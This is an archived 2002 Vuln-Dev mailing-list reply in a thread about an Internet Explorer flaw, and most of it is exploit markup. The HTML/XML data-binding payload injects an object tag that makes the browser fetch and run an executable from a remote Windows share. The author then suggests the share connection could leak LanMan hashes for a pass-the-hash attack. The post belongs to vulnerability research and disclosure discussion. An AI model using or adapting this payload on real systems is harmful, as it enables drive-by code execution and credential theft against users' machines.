Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 09:52:40 -0600
[jswensson () integres com] Thu, Mar 14, 2002 at 04:23:55PM -0800 wrote:
well if activex is enabled,
doing this with a available readable by everyone windows share works
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
]]>
</exploit>
</security>
</xml>
I could be wrong, but could this also open the posiblity of a
"pass the hash" type of attack by sniffing the LanMan hash
when the client connects to \\xxx.xxx.xxx.xxx\share\ ?
http://online.securityfocus.com/bid/233
--
- nocon
======================================
nocon () darkflame net
http://nocon.darkflame.net
======================================
Current thread:
- Re: Rather large MSIE-hole, (continued)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- RE: Rather large MSIE-hole Chad Thunberg (Mar 15)
- Re: Rather large MSIE-hole Joerg Over (Mar 15)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole John Swensson (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole The Blueberry (Mar 14)
- RE: Rather large MSIE-hole Keith Tyler (Mar 15)
- Re: Rather large MSIE-hole Slow2Show (Mar 15)
- RE: Rather large MSIE-hole Tiago Halm (Mar 16)